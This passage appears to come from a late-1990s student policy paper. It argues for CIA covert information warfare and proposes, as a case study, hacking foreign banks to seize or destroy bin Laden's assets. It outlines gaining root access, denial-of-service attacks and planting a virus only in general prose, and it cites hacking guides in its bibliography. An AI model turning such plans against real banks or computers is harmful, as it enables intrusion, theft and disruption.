The problem, said Yossef Bodansky, director of the US House Task Force on Terrorism and Unconventional Warfare, is that "there is no bin Laden Incorporated. That doesn't exist," he said. "There is not something you can go to and say, 'That belongs to him 100 percent.' He is very smart and sophisticated…He also knows that everyone will go after him, so he has carefully concealed what he has."
In addition, bin Laden’s bank accounts are often operated through other people, making it difficult to determine which accounts are his.
Bin Laden also takes the precaution of hiding behind up to six layers of intermediaries in his financial holdings, the daily said, quoting a French woman with Saudi ties as saying she helped transfer 30 million dollars for bin Laden through banks in Switzerland, France and Monaco.
So, before the U.S. can attack him, it must determine both the nature and the location of his fortune.
Ultimately, the problem is that many countries do not follow the same strict banking regulations as U.S. financial institutions. Thus, foreign nations become safe havens that are conducive to money laundering.
An increasing number of countries have moved to deny criminal unfettered access to their financial systems. While much progress has been made, and despite all these efforts, there are still nations that have not yet adequately addressed this problem. And the international criminal is taking full advantage; moving vast sums of illicit money through the world's financial systems. International criminals know no geographic boundaries and can still find safe havens in which to hide.
Furthermore, Stanley E. Morris, former director of the Financial Crime Enforcement Network, explains that "no area of the world has less records for money laundering reporting and financial investigative capacity than the Middle East." Clearly, it is difficult to thwart such a complicated international money-laundering scheme. However, if these efforts are successful, they promise to severely hinder, if not completely halt, bin Laden’s terrorist designs.
The best way to achieve this end is to carry out an information warfare covert operation (see attached diagram). Ultimately, banks providing safe harbor to bin Laden’s funds would be infiltrated electronically. Bin Laden’s assets would then be transferred to accounts in the United States and frozen. Although this will be challenging, there are several factors conducive to success. First, many of bin Laden’s accomplices have been arrested in recent months and have begun to reveal the whereabouts of his assets.
Nearly a dozen of bin Laden's associates, including his former secretary, were arrested by U.S. and foreign investigators in the past six weeks and have divulged information about bin Laden's terrorist group and its financial assets. More arrests are planned.
The second encouraging development is that the Joint Terrorism Task Force has been successfully monitoring bin Laden’s phone calls. Because he is located in the desert of Afghanistan, he has no access to telephone lines and is forced either to use cellular phones or satellite phones.
The task force also has been monitoring bin Laden's cellular phone calls and money transfers by using a satellite positioned over this headquarters in Jalalabad, Afghanistan.
In fact, the monitoring of bin Laden’s phone calls is so precise that "American operatives knew his location to within 10 metres when he was using the Inmarsat telephone."
Essentially, there are only two methods bin Laden can use to manage his financial assets. First, he could be making a direct phone call to his banks’ computers and encrypting his messages to them. If this is the case, then every time bin Laden makes a call, he reveals the identity of another bank to the U.S. Thus, to attack bin Laden, the U.S. must make its own direct phone calls to these banks and impersonate either bin Laden or another account holder. One option would be for a U.S. operative to open a new account in the target bank, allowing the U.S. to legitimately gain access to the bank’s system. Once inside, however, the operative would probe the bank’s computer system for security holes as described earlier. Hopefully, the operative would be able to gain root access and maliciously alter bin Laden’s accounts. There would be no proof that the U.S. was involved, and both the targeted bank and bin Laden himself would be unlikely to go public with the news in order to avoid embarrassment.
The second possibility is that bin Laden is using the public network, or Internet, to communicate with his banks. This implies that he is logging in to a computer on the Internet, and using this computer as a base to connect with other computers. Since there is no direct, wire connection to the Internet in the desert region of Afghanistan, bin Laden’s "home" computer must be located in another country, most likely a sympathetic Arab nation such as Iran, Libya, or Pakistan. This situation, too, can be exploited. First, the U.S. can monitor bin Laden’s connections through its satellite to determine when he is logging in to his home computer. Once he tries to log in, U.S. operatives can mount a denial of service attack on the home computer as described earlier. This would either prevent him from logging in or slow down the home computer enough to make it impossible for bin Laden to conduct his business. Alternatively, once the U.S. knows the identity of the home computer, it can attempt to gain unauthorized access to it using the methods described earlier. If successful, bin Laden’s messages could be monitored and perhaps decrypted, allowing the U.S. to learn his bank passwords. Eventually, the U.S. can plant a virus on the home computer and destroy it, and thus eliminate bin Laden’s ability to tap into the global financial network. Finally, the fact that bin Laden can access his bank’s computer over the Internet means that others can as well. This makes it much easier for the U.S. to gain unauthorized access to the bank and directly deplete bin Laden’s accounts.
Covert operations, relative to overt operations, often save lives and money by preventing escalation of conflicts and minimizing risk to American personnel. Furthermore, because the oversight framework preserves democratic ideals, covert actions are morally justifiable.
The world is increasingly reliant on the global network of information systems, making our adversaries vulnerable to attack. Unfortunately, "robust funding for new tools for conducting information warfare…was not adequately addressed in the budget request" for Fiscal Year 1999. Information warfare has already been used in overt operations quite successfully; extending this to covert operations is a logical step.
The CIA’s organizational objectives closely coincide with the national interest. The DOD’s mission focuses only on a subset of the national interest; specifically, the DOD is not interested in fighting international criminals and is thus ill suited to handle all IW covert operations. Furthermore, the CIA already has an effective oversight framework established, whereas a new framework would have to be created for the DOD.
First, many computer systems have both military and civilian importance, such as air traffic control. The CIA must, therefore, minimize the damage of an IW operation on civilian infrastructure. Second, the CIA must also be conscious of the economic repercussions of covert IW operations since it has the potential to destroy the economic infrastructure of an adversary. Although policy makers may desire this during open hostilities, it is often undesirable during covert actions because of its impact on the civilian population.
Information warfare is not just a buzzword; it represents a fundamental change in strategy for both overt and covert action. This change, in turn, reflects the realities of the Information Revolution currently sweeping the globe. The U.S. has thus far been an IW pioneer, securing a lead over other global superpowers. However, in the covert action arena, IW has received neither adequate funding nor emphasis. In the post Cold War world, where the CIA’s mission consists largely of fighting rogue states, narcotics traffickers, and terrorists, IW expertise will determine success or failure. The enemies of the U.S. need no convincing: they are more technologically sophisticated than ever before. It is up to the U.S. to respond quickly and decisively by equipping the CIA with an unrivalled IW capability.
Adams, James. The Next World War. New York: Simon & Schuster, 1998.
Air Force Information Warfare Center Website, http://www.fas.org/irp/agency/aia/afiwc/
Andrew, Christopher. For the President’s Eyes Only. New York: Harper Collins, 1995.
Baldauf, Scott. "Why It's So Hard for US to Pick Terrorists' Pockets." Christian Science Monitor 27 Aug. 1998: Lexis.
Central Intelligence Agency Website. http://www.odci.gov/cia/information/mission.html
"A Chronology of Defense Intelligence in the Gulf War" Defense Intelligence Agency Website. http://220.127.116.11/Gulfwar_II/frame_set.html
Computer Virus Information, Thomas Jefferson University. http://www.tju.edu/tju/dis/virus/
"Cyber Caper: How Citicorp System was raided." Wall Street Journal 12 Sept. 1995: Lexis.
Darby, Tom and Schmidt, Charles. "The What, Why, and How of the 1988 Internet Worm." http://www1.minn.net/~darbyt/worm/worm.html
Defense Information Systems Agency, branch of DOD which deals with IW most directly. http://www.disa.mil/
DefenseLINK, official web site for the Department of Defense. http://www.defenselink.mil
Downing, Jack, Deputy Director Operations, CIA. Presentation to WWS 401I, 28 Oct. 1998.
Farmer, Dan. "Improving the Security of Your Site by Breaking into it." http://www.gicom.de/hack/admin-guide-to-cracking.htm
Financial Crimes Enforcement Network Website, http://www.ustreas.gov/fincen/border.html
"Hackers Easily Break into DOD Systems." http://www.antionline.com/SpecialReports/mod/Story8.html
Husman, Hans. "Introduction to Denial of Service." http://www.mc2.nu/denial.html.
"Intelligence Authorization Act for Fiscal Year 1999 Conference Report." 105th Congress, 2nd Session, 144 Cong Rec S 11902: 8 Oct. 1998.
"International Scene." Phrack 1998: Volume 7, Issue 48, File 17.
In The Web Software. http://www.weintheweb.com/
Kelley, Jack. "Pressure mounts on Saudi terrorist: U.S. tracks cell calls, funds of bin
Laden, and closes in on associates." USA Today 11 Oct. 1998: Lexis.
Klaus, Christopher. "Packet Sniffers." http://www.unitedcouncil.org/hack/sniffer.txt
Kornblut, Anne E. and Aaron Zitner. "Terror Figure's Family has Benign Ties in U.S." Boston Globe 26 Aug. 1998: Lexis.
Krypto. "Unix Password Hacking." http://www.unitedcouncil.org/hack/unixpw.txt
Lewis, Brian. "Information Warfare." http://www.fas.org/irp/eprint/snyder/infowarfare.htm
Mishra, Raja. "Saudi Exile Uses Wiles, Wealth to Spin Worldwide Web of Terror."
Pittsburgh Post-Gazette 21 Aug. 1998: Lexis.
National Infrastructure Protection Center. http://www.fbi.gov/nipc/index.htm
Nelson, Jack. "U.S. Moves to Seize Assets of Main Terrorist Suspect; Finance Department Targets Financial Holdings of Saudi Multimillionaire Osama bin Laden." Los Angeles Times 22 Aug. 1998: Lexis.
"Panix Attack: ISP Crippled by Denial-of-Service Attack." Multimedia Strategist Sept. 1996: 5.
Ratnesar, Romesh. "What Good Did it Do?" Time 28 Dec. 1998: 26.
"Revealed: Arab Terror Chief's London Network." Times Newspapers Limited, 23 Aug. 1998: Lexis.
Schwartau, Winn. "Class III Information Warfare: has it begun?" www.infowar.com, 1 June 1996
Seeley, Donn. "A Tour of the Worm." http://world.std.com/~franl/worm.html
Skulason, Fridrik. "Michelangelo -- Graffiti Not Art." http://www.virusbtn.com/VirusInformation/michelangelo.html
"US Spying on bin Laden's Financial Activities by Satellite." Agence France Presse 1 Oct. 1998: Lexis.
"World News Highlights From AAP." AAP Newsfeed 12 Aug. 1998: Lexis.